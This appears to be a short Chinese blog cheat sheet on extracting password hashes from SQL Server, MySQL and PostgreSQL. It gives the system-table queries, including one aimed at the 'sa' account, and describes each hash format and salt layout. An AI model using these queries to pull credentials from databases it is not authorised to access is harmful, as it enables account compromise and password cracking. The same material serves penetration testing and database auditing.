select name,password from syslogins
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'
竊取哈希口令:
SQL Server(sha1加密):
2000版本;
Select name,password from master.dbo.sysxlogins
2005版本:
Select password_hash from sys.sql_logins
2000版本
Hash格式:
0x0100(頭部) + 8位salt +40位區分大小寫的hash +40位不區分大小寫的hash
2005版本
Hash格式:
0x0100(頭部) +8位salt +40位區分大小寫的hash
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = ‘sa’ 強制轉換為16進制,以免受格式影響
MySQL:
Select concat(user,password) from mysql.user
4.1版本前:select password(‘password’) 16字節hash
4.1版本后:41字節hash
PostgreSQL:
Select username,passwd from pg_shadow
Select rolname,rolpassword from pg_authid
Md5加密,hash=‘md5’+md5(password+username)
允許明文保存密碼
最后
歡迎關注個人微信公眾號:Bypass--,每周原創一篇技術干貨。
參考資料:
https://wenku.baidu.com/view/5951285091c69ec3d5bbfd0a79563c1ec4dad713.html